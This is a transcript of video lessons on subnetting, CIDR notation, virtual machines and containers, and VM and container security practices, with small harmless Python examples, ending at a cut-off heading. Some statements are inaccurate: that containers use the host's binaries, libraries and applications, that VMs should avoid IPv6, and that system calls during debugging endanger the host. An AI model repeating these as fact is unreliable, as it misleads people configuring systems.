So, consider a large network in the same analogy. If you have a large network, that means there are too many systems combined under one single network, which can be pretty troublesome for a network admin to manage. This is where subnetting comes into the picture. So what is subnetting? You split a large network into smaller segments, which are known as subnets. The best part is that even though the network is split into smaller segments, these subnets can still be interconnected. Going forward, we will look at how they are interconnected. Splitting the network also helps contain broadcast traffic within each segment.
So when you split the network, you divide it into multiple smaller but more manageable segments. Why are they more manageable? This is because each segment within the network maintains a routing table. On a large network, the routing table becomes huge, whereas within smaller segments the routing table is much smaller and easier to maintain.
So, going forward, if you have smaller segments within a network, you are able to isolate the traffic within the segments. That means if there is segment A and segment B, and the traffic originates from segment A, or subnet A, then the traffic is limited to that particular segment.
Now, how does it reach segment B if it is supposed to be sent to segment B? There has to be a router in between, which will take that traffic and pass it on to segment B. Without the help of the router, the traffic will never reach segment B. Smaller segments also help you reduce network congestion, which means that once a network is divided into smaller segments, each segment receives only the broadcast messages that are relevant to it. If something is not relevant to a segment, it will not be received by it.
One of the key reasons is that systems on the network broadcast messages. Such a broadcast message is sent to every computer on the network. Assume there are hundreds of computers; every computer will receive this broadcast message. At the same time, the other hundred computers are also sending some kind of broadcast on the network. This causes a lot of congestion on the network.
So, if there is a smaller segment with a limited number of systems within it, only a limited number of broadcast messages will happen. Therefore, the traffic is contained within that particular segment. Now
let's look at this diagram of subnetting.
[Video description begins] Screen title: Example of Subnetting. [Video description
ends] Now there is router 1, which has multiple subnets or segments which are
created with router 2, 3, and 4, which are further divided into segment 2, 3, and 4.
[Video description begins] A diagram displays containing four switches and four
routers. Switch 1 is connected to Router 1, which is further connected to Router 2,
3, and 4. Router 2 and Switch 2 are connected, Router 3 and Switch 3 are
connected, and Router 4 and Switch 4 are connected. All devices have IP addresses
beginning with 192.168. The IP addresses of Switches 1, 2, 3 and 4 end in 1.0/24,
2.0/24, 3.0/24, and 4.0/24 respectively. The IP addresses of Routers 2, 3 and 4 end
in 5.0/24, 6.0/24, and 7.0/24 respectively. Router 1 has no IP address attached to
it. [Video description ends]
Assume segment 2, or subnet 2, has to send traffic to segment 3. It cannot send the traffic directly; the traffic has to be routed through router 2, then router 1, and eventually router 3, and then it will be passed on to segment 3. Similarly, if any of these segments has to pass traffic to another segment, it will take the appropriate path.
Now, if traffic originating from segment 4 is meant for another system within segment 4 itself, the traffic never goes to router 4. It is passed on within the segment itself. Now let's look at some of the advantages of subnetting. First of all, smaller segments bring better network management, which means that rather than managing hundreds of systems on one large network, if you have smaller segments, you can manage them more efficiently.
Just to give you an example, assume that there is a Finance Department and an Accounts Department. You have to apply some sort of security to these two departments. Rather than putting them into one large network, you can create different segments for them, and you can limit their traffic so that not everybody has access to their segments. This means you are able to control the traffic better rather than having everything under one single network.
You're also able to contain security threats within the subnets, which means that if one subnet is attacked by a hacker, you can limit the attack by disallowing the traffic from going out to the other subnets. The security threat is then contained within that particular subnet, so not much damage is done.
With the help of subnetting, you are also able to set up logical divisions within a network. For instance, if one particular subnet requires only ten systems, you can assign only ten IP addresses and create that subnet; if another subnet requires 100 systems, you can create a subnet of that size. So there is a logical division that you can create; not everything needs to be on a single network. The smaller the segment or subnet, the better the traffic control. So, logical division is always good when you divide the network into smaller subnets.
We just discussed how segments, or subnets, limit the broadcast of packets, and therefore, if there are fewer broadcast packets floating on the network, you get better network performance. Segments contain the broadcast packets within themselves, within their own subnets. And if there is only a limited number of systems, there is less broadcasting happening, so you get better network throughput, or better network performance.
Obviously, network congestion is reduced because subnets are not throwing packets out to other subnets; the broadcast packets are retained within them. So there is less network congestion spilling from one particular subnet over to the other subnets. Similarly, the other subnets are not able to send their broadcast messages to other subnets.
So every subnet retains its traffic within itself and, therefore, the overall network congestion is greatly reduced. [Video description begins] The following information is displayed on screen: Reduces network congestion by restricting traffic within the network. [Video description ends]
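As a quick illustration of how traffic containment follows from the addressing, the following Python snippet, using only the standard ipaddress module, checks whether two hosts from the earlier diagram fall in the same /24 subnet; hosts in different subnets need a router to reach each other. The host addresses are invented examples within the diagram's address ranges.

    import ipaddress

    def same_subnet(ip_a: str, ip_b: str, prefix: int) -> bool:
        """True if both hosts fall inside the same network for the given prefix length."""
        net_a = ipaddress.ip_interface(f"{ip_a}/{prefix}").network
        net_b = ipaddress.ip_interface(f"{ip_b}/{prefix}").network
        return net_a == net_b

    # Two hosts in 192.168.2.0/24 can talk directly; a host in 192.168.3.0/24 needs a router.
    print(same_subnet("192.168.2.10", "192.168.2.20", 24))  # True  -> same segment
    print(same_subnet("192.168.2.10", "192.168.3.10", 24))  # False -> traffic must be routed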
Let's now look at some of the disadvantages. We saw advantages in terms of better network performance and better logical division; now we are going to look at some of the disadvantages. The first disadvantage is that it requires more hardware, in terms of putting more routers in place. [Video description begins] The following information is displayed on screen: Requires more hardware and increases cost. [Video description ends]
Every segment, in order to interact with another segment or send traffic outside itself, needs to have a router in place. [Video description begins] The following information is displayed on screen: Addition of routers and switches. [Video description ends] This means that more hardware is going to be required.
Also, when you talk about creating subnets, you need to have a lot of experience and skill. There are a lot of mathematical calculations that you will have to do in order to come up with the exact number of subnets you need and the IPs per subnet, so you need a lot of expertise in creating subnets.
If you ask a newcomer or a new administrator to sit down and design the number of subnets you need, it is probably going to be an impossible task for that person. You need to have a lot of mathematical calculations done, and then you can come up with the number of subnets and the IPs per subnet that you need.
The CIDR Notation
[Video description begins] Topic title: The CIDR Notation. Your host for this
session is Ashish Chugh. [Video description ends]
Earlier we looked at subnetting and its advantages and disadvantages. Now we're going to look at CIDR notation. CIDR stands for classless inter-domain routing. Subnetting has been in practice for many, many years, since the inception of the Internet or even before that.
CIDR is meant to replace the addressing architecture of the classful network design on the Internet. Classful subnetting ends up wasting a lot of IP addresses when you divide a network into multiple subnets. [Video description begins] According to the slide, CIDR notation is an alternative to subnetting. [Video description ends]
Not all the IP addresses are being utilized. When you bring in CIDR notation, you have better control over addressing continuous blocks of IP addresses, which means that you can allocate only the required number of IP addresses rather than allocating a complete classful range to a small segment that needs only a limited number of IP addresses.
If you allocate the entire classful range, then except for the handful of IP addresses that are being used, every other IP address that is left over is wasted. [Video description begins] According to the slide, CIDR notation allows control over addressing continuous blocks of IP addresses. [Video description ends]
So, because there is better control over how IP addresses are divided and allocated, CIDR helps improve the efficiency of IP address distribution, which means you allocate what is required and no more. That is one of the key benefits of using CIDR notation.
If you look at the table being shown, there are three classes of IP addresses: Class A, Class B, and Class C. Then you have the IP address ranges: 1 to 126, 128 to 191, and 192 to 223. There is a default netmask assigned to each one of them. With CIDR notation, you write a slash followed by a number. So for 255.0.0.0, the CIDR notation comes out to /8. Similarly, for class B, the CIDR notation comes out to be /16, and for class C, the CIDR notation comes out to be /24, which is equivalent to 255.255.255.0. [Video description begins] According to the slide, the default netmask for class B is 255.255.0.0. [Video description ends]
Let's now look at the CIDR notation and its binary representation along with the dotted decimal representation. When you talk about class A, the first octet, which comprises eight bits, is all ones. The dotted decimal representation, which is the subnet mask, is 255.0.0.0, and the CIDR notation here is /8.
When you talk about class B, the first two octets are all ones and the last two octets are all zeros. The dotted decimal representation is 255.255.0.0 and the CIDR notation is /16. Then you come to class C: the first three octets are all ones and the last octet is all zeros. The dotted decimal representation is 255.255.255.0 and the CIDR notation is /24.
Now, an octet of all ones converts to 255. So when you move down to class B, where the first two octets are all ones, the first two octets of the mask are 255 and 255. Similarly, in class C, the first three octets are all ones, which means the dotted decimal will have 255, 255, 255 in the first three octets and zero in the last one. And the CIDR notation for that is /24.
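Here is a small Python example, using only the standard ipaddress module, that reproduces the mapping between a CIDR prefix length and its dotted decimal netmask discussed above.

    import ipaddress

    # Map the classful defaults discussed above to their CIDR prefixes and netmasks.
    for label, prefix in [("Class A", 8), ("Class B", 16), ("Class C", 24)]:
        net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
        print(f"{label}: /{prefix} -> netmask {net.netmask}")

    # Class A: /8 -> netmask 255.0.0.0
    # Class B: /16 -> netmask 255.255.0.0
    # Class C: /24 -> netmask 255.255.255.0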
Tips and Tricks in Subnetting
[Video description begins] Topic title: Tips and Tricks in Subnetting. Your host for
this session is Ashish Chugh. [Video description ends]
Let's now look at the subnetting cheat sheet. Subnetting, as we discussed earlier, can be a very difficult task. Therefore, there is a cheat sheet that you can use to come up with the number of addresses you need. For instance, if you look at an IP address such as 192.168.100.1 with a CIDR notation of /24, you don't have to do any kind of calculation.
You can simply look up what /24 means and what the subnet mask would be. Here the subnet mask would be 255.255.255.0, which provides a total of 256 IP addresses. The total number of usable IP addresses you get is 254, because you have to drop the first and the last IP address, leaving only 254 usable IP addresses.
Similarly, if you look at an IP block of 192.168.100.0 with a CIDR notation of /22, this will give you a total of 1,024 IP addresses, out of which 1,022 will be usable. You can simply divide 1,024 IP addresses by 256 and you will get a total of 4 /24 subnets in this case.
Carrying on the example, if you look at /22 and you know that there are 1,024 addresses, then dividing 1,024 by 256 gives you 4 subnets. So this becomes a pretty easy and handy cheat sheet for calculation. We not only calculated the number of IP addresses we will get, we were also able to narrow down, for a particular CIDR notation, how many subnets and how many hosts we can get.
If you take another example with a CIDR notation of /16, you would get 65,536 addresses, which can be divided across 256 /24 subnets. So the smaller the CIDR notation number, the more hosts you get and the more subnets you are able to create.
The higher the number, the fewer addresses per subnet. For example, if you take /28, you will have only 16 addresses per subnet (14 of them usable as hosts), and within a /24 you can create only 16 such subnets. With 28 network bits and 4 host bits, that gives you the subnet mask of 255.255.255.240.
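If you'd rather compute these figures than memorize the cheat sheet, the standard Python ipaddress module can do the arithmetic for you. The blocks below match the examples just discussed; the exact network addresses are illustrative.

    import ipaddress

    def summarize(cidr_block: str, subnet_prefix: int = 24) -> None:
        """Print total addresses, usable hosts, and how many subnets of the given prefix fit."""
        network = ipaddress.ip_network(cidr_block)
        total = network.num_addresses
        usable = max(total - 2, 0)          # drop the network and broadcast addresses
        subnets = sum(1 for _ in network.subnets(new_prefix=subnet_prefix))
        print(f"{cidr_block}: {total} addresses, {usable} usable hosts, "
              f"{subnets} x /{subnet_prefix} subnets")

    summarize("192.168.100.0/22")                    # 1024 addresses, 1022 usable hosts, 4 x /24 subnets
    summarize("192.168.0.0/16")                      # 65536 addresses, 65534 usable hosts, 256 x /24 subnets
    summarize("192.168.100.0/24", subnet_prefix=28)  # 256 addresses, 254 usable hosts, 16 x /28 subnets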
VMs and Containers
[Video description begins] Topic title: VMs and Containers. [Video description
ends]
Let's now look at virtual machines, or VMs, and containers. We will also compare them and see how they differ from each other. First, let's look at virtual machines. A virtual machine is not a physical system. It's an emulation of a physical system, which means a virtual machine can run everything a physical system can, except that it does not have its own dedicated physical hardware. That is the reason it is known as an emulation of a system.
Depending on the capacity of the physical host, a single physical host can run multiple virtual machines, which means that you could have as many as 10, 20, 30, or 40 virtual machines running on a single physical host. But the number of virtual machines depends on the physical capacity, or physical resources, of the physical host.
When you are running multiple virtual machines on a single host, the hardware resources, which are CPU, memory, and storage, are shared across the virtual machines. A single virtual machine might utilize two CPUs, 20 gigabytes of storage, and 2 gigabytes of memory, and another virtual machine can use the same kind of resources. So if the physical host has, let's say, 20 gigabytes of memory and 1 terabyte of hard disk space, all these resources are shared across the virtual machines.
A virtual machine does not directly interact with the hardware of the physical system. There is something called a hypervisor that sits between the hardware of the physical host and the virtual machine. The hypervisor takes requests from the virtual machine, passes them on to the hardware of the physical system, and ensures that the virtual machine gets the resources it demands or is configured with.
On the other hand, if you look at containers, containers use only a single operating system. For instance, if you are running containers within a Windows or a Linux operating system, the containers run on that single operating system; you cannot have multiple operating systems running within containers the way you can with virtual machines. A container sits on top of the physical host and its operating system, whereas virtual machines are effectively multiple systems running on a single host.
Containers are embedded within the operating system of the physical host. They share the operating system kernel, libraries, and binaries, which means the container itself does not have its own OS kernel, binaries, or libraries; it basically shares all of these from the system where it resides.
One of the key benefits of using containers is that they can use the same set of applications hosted on the operating system. If you have a physical host running several applications, you need not deploy these applications within the container; it can use the same applications from the host system.
Now let's look at the pictorial representation of virtual machines and containers. When you look at virtual machines, there is the physical infrastructure, which is the physical host with a set of resources like CPU, memory, and storage space. There is a hypervisor that sits on top of the physical host. There are hypervisors known as bare metal hypervisors, which do not require a separate operating system to run; they carry their own operating system, so they are installed directly on a bare metal system.
Once the hypervisor, along with its operating system, is applied to a bare metal system, you can create multiple virtual machines, each carrying a guest operating system. Each guest operating system has its own applications, and it has its own binaries and libraries.
In the pictorial representation, there are three different guest operating systems running, which are basically three different virtual machines. Each virtual machine carries its own guest operating system, binaries and libraries, and applications. On the other hand, if you look at containers, there is the physical hardware, which is the host system. Then there is an operating system, which could be Windows or Linux, and on top of that a container platform such as Docker.
Then you have something called a container manager, which is used for managing the containers running within the operating system. Each one of these containers uses the same set of binaries and applications from the operating system that is applied on the host.
Let's now look at the comparison between virtual machines and containers. When you talk about footprint, virtual machines are heavy, which means they demand a lot of resources. Because they are emulations of actual systems, they need a certain amount of resources to run.
If you compare, let's say, Windows 10 on a physical host with Windows 10 in a virtual machine, just because Windows 10 is installed in a virtual machine does not mean it will require less memory or less storage space. The resource requirements remain the same. Therefore, the footprint of a virtual machine is typically very heavy.
When you talk about containers, their footprint is pretty light. This is because they use the host operating system and its libraries and binaries. When you talk about the performance of virtual machines, it is limited; it depends on the amount of resources allocated to them. Therefore, you cannot be sure that virtual machines will give you the best performance possible.
When you talk about containers, their performance depends on the operating system on which they are configured. Regarding the operating system, as we've discussed earlier, each virtual machine can run its own operating system. So on a single physical host, you can have virtual machines running both Linux and Windows.
On a single physical host, you can have multiple virtual machines running, and each virtual machine can run its own operating system. For instance, virtual machine 1 can run Linux, virtual machine 2 can run Unix, virtual machine 3 can run Windows 10, and another virtual machine can run Windows 8.1.
If you talk about containers, containers are deployed on the host operating system. Therefore, they do not have the flexibility of running multiple operating systems. [Video description begins] According to the slide, containers share the host OS. [Video description ends]
When you talk about the virtualization type, virtual machines depend on hardware virtualization, which means they consume the hardware resources available on the physical host. Containers, because they depend on the operating system, have a virtualization type that is considered OS level.
When you talk about the startup time of virtual machines, it could be several minutes. It depends on the amount of resources allocated and the number of applications installed within the virtual machine. For example, if there are multiple applications installed in a single virtual machine and each application is set to start up at boot time, then obviously the virtual machine is going to have a slower startup time than a virtual machine that does not have any applications.
Containers, on the other hand, because they are embedded within the operating system, have a startup time of a few milliseconds. As far as memory is concerned, a virtual machine has to take its memory from the physical host. If the physical host has limited memory, then obviously the virtual machine will only get a portion of it. Containers use less memory because they are much more lightweight; therefore, they do not require too much memory to run.
As far as virtual machines are concerned, the security level can be set high, which means a virtual machine can run in full isolation. Even though it is hosted on a physical host, it does not need to interact with the physical host. You can completely isolate that particular virtual machine, or you can configure it to interact only with the physical host, or to interact with another set of virtual machines but not with the physical host. It depends on the configuration, but yes, you can fully isolate the virtual machine if required.
When you talk about containers, because they are embedded within the operating system, that is how you have to implement them. So there is only a limited level of security that can be applied; only process-level isolation is possible with containers.
Now let's look at some of the examples of different applications or different
software that are available for virtual machines and containers. So when you talk
about the products for virtual machines, you have VMware vSphere, which is more
like a management application that can connect multiple ESXi servers. Now ESXi
servers are the ones which will actually run the virtual machines. Using vSphere,
you can connect multiple ESXi servers in the management console and manage all
of these ESXi servers running virtual machines under one umbrella.
Then you have the Xen product, which is also meant for virtualization. Then you have Hyper-V, which is from Microsoft. Hyper-V is partially embedded within Windows Server, and it is also available as a standalone product. When you talk about containers, there is a full-fledged application known as Docker, which is meant to run containers. Containers can also be run within Windows Server.
Deployment Considerations for VMs and Containers
[Video description begins] Topic title: Deployment Considerations for VMs and
Containers. Your host for this session is Ashish Chugh. [Video description ends]
Just like physical system deployment, containers also have deployment considerations, or basically best practices or guidelines that one must follow. The first one is that you should plan the deployment with a lot of caution. Containers have to be implemented within a system.
So therefore, before you even proceed with the deployment, you need to do careful planning. What kind of image are you using? What kind of security are you going to implement? What will run within the containers? You have to plan this kind of deployment before you actually go ahead and deploy the containers.
You also need to use monitoring tools that can help you collect data. For instance, some of the data that you can collect is the resource utilization of the containers within a system. Then you also need to ensure that you use only verified base images. You should download base images only from legitimate sources on the Internet and verify them before use; a quick checksum-verification sketch follows after this paragraph. Secondly, you can also create your own base images. However, you have to ensure that they are hardened before they are used for containers. You should also perform security audits on the continuous deployment process. This means that no container should be deployed without a security audit, and there should be continuous audits happening on the containers to ensure that they are working as expected.
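To make the verified-base-image point concrete, here is a minimal Python sketch, assuming you have downloaded a base image tarball and the publisher lists a SHA-256 checksum for it; the file name and digest shown are hypothetical placeholders, not values from this course.

```python
import hashlib

def sha256_of_file(path: str) -> str:
    """Compute the SHA-256 digest of a file, reading it in 1 MB chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hypothetical placeholders: the base image you downloaded and the checksum
# published by the legitimate source.
IMAGE_PATH = "ubuntu-base-22.04.tar"
PUBLISHED_SHA256 = "0" * 64

if sha256_of_file(IMAGE_PATH) == PUBLISHED_SHA256:
    print("Checksum matches: the base image can be used.")
else:
    print("Checksum mismatch: do NOT build containers from this image.")
```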
Moving ahead, you should also ensure that containers use proper encryption
methods. So for instance, you would not want to use an encryption method that has
been known for being vulnerable. Therefore, you want to use the best encryption
that is possible and implement it within the containers so that they are hardened and
secure.
Now what happens if a vulnerability is detected within a container? In that case, you should not attempt to fix the vulnerability in place. Instead, you should destroy the container, and if an updated version of the base image is available, you should use it to create a new container.
And lastly, a lot of people tend to make system calls when they are debugging code within a container. You should avoid that. Remember, too many system calls can actually endanger the base operating system that is being used. So therefore, when you are debugging code within containers, you should limit the number of system calls.
Best Practices for Deploying VMs
[Video description begins] Topic title: Best Practices for Deploying VMs. Your
host for this session is Ashish Chugh. [Video description ends]
Let's now look at some of the best practices for deploying virtual machines. Now
there are various best practices that you would come across if you search the
Internet. What we have narrowed down is few of the key best practices that you can
use when you are deploying virtual machines.
The first one is that the host and the virtual machine operating system should always be updated. [Video description begins] The following information is displayed on screen: Keep the host and virtual machine operating system and application up-to-date. [Video description ends] This is a standard practice that you ought to follow, because virtual machines are just simulations of a physical machine.
Now if there are vulnerabilities within the virtual machines, they can be exploited
very easily, just like a hacker can exploit vulnerabilities of an operating system
running on a physical machine. Remember, a virtual machine is just a replica of a physical machine, except that it does not have its own physical hardware. Otherwise, it functions exactly like a physical machine.
Therefore, if physical machines can be exploited because of vulnerabilities, so can
the virtual machine. So therefore, you need to ensure that the host, which is running
the virtual machines, and the virtual machines themselves both are up-to-date with
the latest updates and security patches.
Now when you are deploying a virtual machine, which means you are creating a virtual machine and putting it into production, you need to ensure that you do not overcommit the virtualization servers; in other words, limit how many virtual machines are deployed to each server. Every virtual machine requires a certain amount of memory to run. Just like a physical machine requires physical memory to run, a virtual machine requires memory allocated from the host. Now that allocated memory cannot be more than the memory of the physical host where the virtual machine is running. Therefore, if a virtual machine, including the operating system and the applications, requires 4 GB of memory, you need to allocate that. However, you have to ensure that the physical host has more than 4 GB of memory available to accommodate this request from the virtual machine.
Then it is advisable that when you are using a virtual machine, you do not use IPv6 address allocation; you should only use IPv4. One of the biggest reasons is that most networks are still running with an IPv4 configuration. Therefore, avoid mixing IPv4 and IPv6 configurations. The next point to consider is that you should use either pass-through or fixed virtual disks attached to SCSI controllers. Each virtual machine will require some sort of storage. Now when you configure, let's say, a 50 gigabyte virtual hard drive for a virtual machine, where does it need to be stored? You can configure it as a pass-through or fixed virtual disk attached to a SCSI controller. SCSI controllers will give you better throughput than other kinds of disk controllers.
Then you have to ensure that you do not overprovision the host resources. Now what are the host resources? You are talking about CPU, memory, and the physical disk. You should not overprovision them. Now a host might be running one virtual machine or it might be running ten, depending on the capacity the host has. So for instance, if the host has 16 gigabytes of memory, let's say you reserve 4 gigabytes for the host itself. Now you have 12 gigabytes available. If you run 10 virtual machines and allocate 2 to 4 gigabytes to each, the total allocation could reach 24 gigabytes, far more than the 12 gigabytes that are actually available. That is overprovisioning. But remember, if you start all the virtual machines at one go, it will not work. Some of the virtual machines, because the memory is overprovisioned, will simply throw an error that there are no resources or no memory available for them to start. So therefore, it is necessary to keep the provisioning of host resources within the available capacity. A small sketch of this arithmetic follows below.
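Here is a minimal Python sketch of the memory arithmetic just described; the host size, the reservation, and the per-VM allocations are hypothetical numbers used only to illustrate the overprovisioning check.

```python
# Hypothetical numbers mirroring the example above.
host_memory_gb = 16
reserved_for_host_gb = 4
available_for_vms_gb = host_memory_gb - reserved_for_host_gb   # 12 GB left for VMs

# Planned allocation for ten virtual machines, 2-4 GB each.
vm_allocations_gb = [4, 4, 2, 2, 2, 2, 2, 2, 2, 2]
total_allocated_gb = sum(vm_allocations_gb)

print(f"Available for VMs : {available_for_vms_gb} GB")
print(f"Total allocated   : {total_allocated_gb} GB")

if total_allocated_gb > available_for_vms_gb:
    print("Memory is overprovisioned: not every VM can be started at the same time.")
else:
    print("Allocation fits within the available host memory.")
```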
Let's move on to some more best practices for deploying virtual machines. Now there will be some applications which can only be deployed on a physical host. So you will have to verify whether an application can be deployed on a virtual machine. Now this depends; there are several applications which cannot be deployed on virtual machines. There is also a possibility that you have multiple virtual machines running across multiple hosts. You would have to see if they can be consolidated onto a single host or onto fewer hosts.
Then comes the application consolidation part. You could also do application
consolidation over virtual machines, which means instead of running one
application per host, you could have one application per virtual machine, which
means if there were ten physical hosts that were running ten different applications,
you could have one host with lot of system resources that can run ten virtual
machines and each virtual machine can run one application. Now with this practice,
you have actually freed up nine physical hosts which can be utilized for various
purposes.
Now all virtual machines may not work as you expect them to. This could be because you have not tested their workloads properly. So before you put a virtual machine into production, you have to ensure that you test its workload, which means you have to ensure that the applications running within the virtual machine get enough memory, CPU, and disk throughput. Now if there is more workload than the virtual machine can tolerate, then obviously application access is going to be slow. So you have to test that kind of workload before the virtual machine is actually put into production. There are different methods you can use to deploy virtual machines. One is the manual method, which means you create a virtual machine manually and deploy it.
Second, you can automate the virtual machine deployment. It could be done using a script that creates multiple virtual machines at once, or by using a template-based virtual machine and creating more virtual machines from it.
Let's talk about a scenario in which your organization has created a Windows 10 virtual machine designed for a specific purpose. Now you need to create ten similar virtual machines that have exactly the same configuration as this virtual machine. So what do you do in that case? With the manual method, you would sit down, create ten virtual machines, and configure all the settings by hand. Now if you automate this, you can convert the first virtual machine into a template and then generate ten more virtual machines out of this template. This can happen in a few minutes, whereas if you use the manual method, it might take you many hours or maybe a couple of days before you can get ten machines up and running.
Now virtual machines also have an integration component which allows the user to interact with the virtual machines in a much better way. For instance, VMware-based virtual machines have an integration component called VMware Tools. It gives you a lot of benefits. One of the benefits is that it allows you to move the cursor in and out of the virtual machine without pressing any key. Therefore, it is good to install the integration components within the virtual machines.
Best Practices for VM and Container Security
[Video description begins] Topic title: Best Practices for VM and Container
Security. Your host for this session is Ashish Chugh. [Video description ends]
Now we'll look at some of the best practices that you can implement for virtual machine, or VM, security. First of all, you should remove any kind of unnecessary virtual hardware from the virtual machine. A lot of people, when they create a virtual machine, tend to add multiple network adapters and USB devices to the virtual machine. However, in reality, most of these are never used or are used rarely. So a lot of virtual hardware is attached to the virtual machine, and it can be exploited.
So one of the best mitigation methods to stop the exploitation of unnecessary virtual hardware is to remove it. For example, if your virtual machine requires one virtual Ethernet adapter, then you should have only one; you should not have two or three or four. Similarly, if a virtual USB adapter is not required, then you should remove that.
Next best practice is to enable logging for the VM, which is the virtual machine.
Now this logging can be implemented on the server that is hosting the virtual
machine. Similarly, logging should be enabled within the virtual machine as well.
The reason is that you want to track any action being performed within the virtual machine.
Similarly, when you configure logging on the server that is hosting the virtual
machine, you will be able to track the activities that virtual machine has performed.
So for instance, what time the virtual machine started, what time the virtual
machine was shut down. So these kinds of activities, you'll be able to track.
And this can be specifically useful when you know a virtual machine was supposed
to be in a shutdown state but it was used in a malicious activity by a hacker. Then
you can go back to the logs on the virtual server or the server hosting the virtual
machine and figure out whether this virtual machine was ever started or not.
Then you should also avoid using privileged accounts, one, to power up the virtual
machine, second, within the virtual machine. Now for powering up the virtual
machine, you do not need admin or the root access depending on the type of virtual
server you are using. So for instance, it could be ESXi server or Hyper-V. You do
not need to assign administrative privileges to the users who are going to invoke
virtual machines. You can simply give them user-level permissions to allow them
to invoke the virtual machines.
And similarly, within the virtual machines, you should also give users normal user access unless there is a requirement for them to have administrative access. The same rule of thumb that applies to physical systems applies within virtual machines as well. You should also configure session timeouts for virtual machines.
Now let's assume a scenario in which a user only used the virtual machine for half an hour. After that, the user did not shut it down, and the virtual machine was left unattended. In that scenario, if you had configured a session timeout, the virtual machine would time out and lock itself. The user, when he comes back, will have to unlock the virtual machine.
Just like the physical systems which require patching, the virtual machines also require patching and updates on a regular basis. Remember, virtual machines are just simulated systems that are running on a physical host. They virtually replicate a physical system, possibly with a different operating system or different applications, but they are simulations of real systems. Therefore, they also need to be patched and updated regularly.
For example, if a virtual machine is running Windows 10 and there are critical
updates that are rolled out by Microsoft, then not only you have to update the
physical systems but you have to also update the virtual machines with Windows
10.
Along with updating the virtual machines, you need to also update the hosts that are
running the virtual machines. Remember, they are the physical systems. They might be running any type of operating system, and depending on the type of product you are using to host virtual machines, they will also require patching and updates on a regular basis as and when updates are rolled out.
Similar to the user accounts in the physical environment, which could be Active
Directory or any other kind of directory services, you should also have password
policies implemented within the virtual machines.
There could be different scenarios for how you are running these virtual machines. A virtual machine could be running in a completely isolated environment, which means there is only one virtual machine running. It could be a separate virtual network comprising multiple virtual machines, or a virtual machine could also be part of Active Directory. This is the same Active Directory which has the other physical systems as its members.
Now because the physical systems are running Windows and there are password policies that are imposed through Active Directory, if a virtual machine is part of the domain, it will also have the password policies rolled out to it. Now the account lockout policy, to be precise, locks out an account if a password has been entered incorrectly a certain number of times.
So for example, if the policy is configured to allow you only three attempts at entering the password and the third attempt is also incorrect, then your account gets locked out for a certain period of time, such as 30 minutes.
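In practice this is enforced through Group Policy or your directory service, but the lockout logic itself can be sketched in a few lines of Python; the three-attempt threshold and 30-minute lockout window below simply mirror the example above and are not tied to any particular product.

```python
import time

MAX_ATTEMPTS = 3                 # allowed failed attempts before lockout
LOCKOUT_SECONDS = 30 * 60        # lock the account for 30 minutes

failed_attempts = {}             # username -> (failure_count, time_of_last_failure)

def is_locked_out(user: str) -> bool:
    """True if the account hit the threshold and the lockout window is still open."""
    count, last_failure = failed_attempts.get(user, (0, 0.0))
    return count >= MAX_ATTEMPTS and (time.time() - last_failure) < LOCKOUT_SECONDS

def record_failed_login(user: str) -> None:
    count, _ = failed_attempts.get(user, (0, 0.0))
    failed_attempts[user] = (count + 1, time.time())

def record_successful_login(user: str) -> None:
    failed_attempts.pop(user, None)   # a good login resets the counter
```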
The next best practice that we should talk about is shutting down unused virtual machines. A lot of hosts that run virtual machines will have virtual machines that are not being utilized but are still running. What we have to understand is that these unused virtual machines can be a danger. If they are exploited, they can be used in various types of attacks, such as a denial-of-service attack. So therefore, it is wise to shut them down if they are not being used.
Next, when you have traffic flowing between two virtual machines or more than
two virtual machines, typically, this type of traffic is in clear text, which means it
can be intercepted using a packet analyzer or a packet sniffer like Wireshark. So
therefore, it is best to encrypt the traffic using a security protocol such as IPSec.
Continuing with the best practices for virtual machine security, a virtual firewall should be enabled on the virtual machines to ensure that they are secure. For instance, it could be Windows Firewall running on each virtual machine, restricting both incoming and outgoing traffic and ensuring the virtual machine does not receive any traffic that is malicious.
So let's now look at the best practices for container security. As a standard rule of thumb, you should not run a container as root. This applies to physical systems as well. In a lot of security policies, one of the first points mentioned is that users should not be given root or administrative access to the systems. This is because the moment you have root or administrative access, you can do virtually anything with the system.
Now to ensure that a user is not able to tamper with the security or the settings of the system, you should give them only normal user access. The same rule applies to containers. Secondly, when you are running containers, you need to download images. Now these images should be downloaded only from legitimate repositories or sources. You should not download container images from any unknown website or unknown source, because that image can contain malware. Once malware gets into the system, it can do a lot of damage. A minimal sketch of running a container as a non-root user from a pinned image follows below.
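As a rough illustration, not a procedure prescribed by this course, the Docker SDK for Python can start a container as a non-root user from an image pinned by digest; the digest, UID:GID, and command below are hypothetical placeholders.

```python
import docker  # Docker SDK for Python: pip install docker

client = docker.from_env()

# Hypothetical digest: pinning by digest means a tampered tag cannot be substituted.
image_ref = "alpine@sha256:" + "0" * 64

container = client.containers.run(
    image_ref,
    command="id",          # just prints which user the process runs as
    user="1000:1000",      # unprivileged UID:GID instead of root
    read_only=True,        # read-only root filesystem inside the container
    detach=True,
)
container.wait()            # let the short-lived command finish
print(container.logs().decode())
```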
You should also enable auditing and ensure that you are able to detect and manage
changes that are happening to the images, which means if you have downloaded an
image, you need to ensure that if there is any change that is being made to it, you
are able to detect that. Because most of these images from the legitimate sources
are well designed and they are meant for a specific purpose. Now if there are
unknown and undetectable changes that are happening to the images, that can
tamper with the security of the image.
Another best practice that we can follow for container security is we should use a
sandbox container, something like gVisor. This means we can run untrusted and
trusted workloads together on the same host. Now what happens is you don't need a
sandbox container for the trusted workload. You need sandbox container for
untrusted workload, which means if there is anything that goes wrong because of
the untrusted workload, it is contained within the sandbox.
Therefore, you can use a sandbox container like gVisor to segregate your untrusted
workload within a contained environment on the same host. You should also ensure that the kernel of the system you are using to run containers is hardened, which means any unnecessary kernel module or service running on top of that kernel is stopped, and the kernel is hardened to the extent that it serves only its specific purpose.
Similarly, the host configuration should also be hardened. It should not have unnecessary open ports, and it should not run unnecessary services. You should also use isolation and least privilege practices. Least privilege goes back to the point I mentioned earlier, that users should not be given root or admin access on the system. This means that if users can run a container with normal user privileges, then they do not need root or admin access.
And containers must be run in isolation, which means they should not interfere with the other applications that might be running on the system. Then you
should also use a method to centrally manage access controls. Now if there are
multiple systems that you have, there are multiple containers that you are running,
it will become difficult for you to not only manage them but also monitor different
types of access controls on these containers. So therefore, you have to use a method
in which you can centrally manage the access controls.
Types of DNS Attacks and their Mitigations
[Video description begins] Topic title: Types of DNS Attacks and their
